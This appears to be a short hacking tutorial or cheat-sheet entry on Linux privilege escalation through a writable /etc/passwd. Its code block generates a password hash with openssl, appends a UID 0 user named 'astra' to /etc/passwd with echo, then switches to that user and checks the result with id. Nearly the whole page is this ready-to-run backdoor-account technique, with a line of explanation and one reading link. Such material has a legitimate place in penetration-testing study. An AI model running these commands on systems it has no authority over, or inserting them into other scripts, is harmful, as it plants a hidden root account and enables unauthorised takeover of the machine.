Privilege Escalation: Writing a User to /etc/passwd
Sometimes an application will be misconfigured and will have the capability to read/write to the /etc/passwd file. This code below creates a hashed password and demonstrates how to echo that into the /etc/passwd file.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
# generate a password openssl passwd -1 # manually enter your password below... it will ask twice. i<3hacking # outputs this hashed password string $1$/UTMXpPC$Wrv6PM4eRHhB1/m1P.t9l. # create user in /etc/passwd echo 'astra:$1$/UTMXpPC$Wrv6PM4eRHhB1/m1P.t9l.:0:0:astra:/home/astra:/bin/bash' >> /etc/passwd # switch user su astra # id id |
Further Reading
https://www.cyberciti.biz/faq/understanding-etcpasswd-file-format/